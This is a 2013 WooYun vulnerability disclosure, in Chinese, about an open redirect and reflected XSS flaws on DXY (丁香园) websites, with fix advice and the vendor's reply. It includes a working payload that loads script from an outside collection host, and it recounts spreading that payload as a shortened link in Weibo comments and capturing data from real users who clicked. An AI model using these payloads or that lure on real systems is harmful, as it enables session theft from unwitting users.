当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019684

漏洞标题:丁香园漏洞小礼包(含过程,反射性xss利用技巧)

相关厂商:丁香园

漏洞作者: 梧桐雨

提交时间:2013-03-07 15:46

修复时间:2013-04-21 15:46

公开时间:2013-04-21 15:46

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-07: 细节已通知厂商并且等待厂商处理中
2013-03-07: 厂商已经确认,细节仅向厂商公开
2013-03-17: 细节向核心白帽子及相关领域专家公开
2013-03-27: 细节向普通白帽子公开
2013-04-06: 细节向实习白帽子公开
2013-04-21: 细节向公众公开

简要描述:

丁香园几个小礼包,xss+url跳转

详细说明:

http://paper.pubmed.cn/do.php?ac=login&rfu=http://paper.pubmed.cn/ rfu对地址未验证
http://paper.pubmed.cn/do.php?ac=login&rfu=(可构造任意链接进行跳转)
主要还是说说xss吧,没说明,一个礼包- -剑心还是不给过。这次我还是和上次一样。来一个利用吧。
我选中了http://www.jobmd.cn/article站点的搜索处的XSS进行测试。
之前提交过,但是没过程未过,这次我想了下,本想选择在论坛处通过发帖的形式传播一下。但是新注册,不能通过邀请,但是又不想手机注册,那怎么办呢?
我忽然想到了一个好的idea,就是通过@fenng的微博作为一个跳板(大辉哥微博是很多人看的哟,因此这里头肯定会有人是登录了丁香园帐号的。)
构造好代码:http://www.jobmd.cn/article/search.htm?keywords=%3C%2Ftitle%3E%3Cscript+src%3D%22http%3A%2F%2Fxss.ezsec.org%2F%3Fu%3Df71717%22+%3E%3C%2Fscript%3E&category=-1&action=Search&action_search=
这个时候还是太长了,我们通过url.cn转下,让他变得更加简洁:
http://url.cn/E273r7
然后通过小微博号发布到fenng的微博评论上。(带一点儿社工的性质)

xss-09.jpg


没有多久,就有几个用户中招了。

xss-10.jpg

漏洞证明:

获取到的信息:

2424.jpg


242424.jpg


危害证明,反射XSS用得好,一样可以造成很大的危害~
还有一处也有xss,顺便也发了,这个也是你们旗下的,还在内测中,好好修复下吧
http://pubmed.cn/index.php?st="><script>alert(1)</script> 首页反射型XSS
st参数没有过滤好。

修复方案:

修复建议:
url跳转:referer的限制下,加入有效性验证Token。
xss:过滤关键的地方,标题也别漏了。安全是一个整体,不是一个部分。

版权声明:转载请注明来源 梧桐雨@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-03-07 15:50

厂商回复:

感谢梧桐雨的工作。火速修正中...

最新状态:

暂无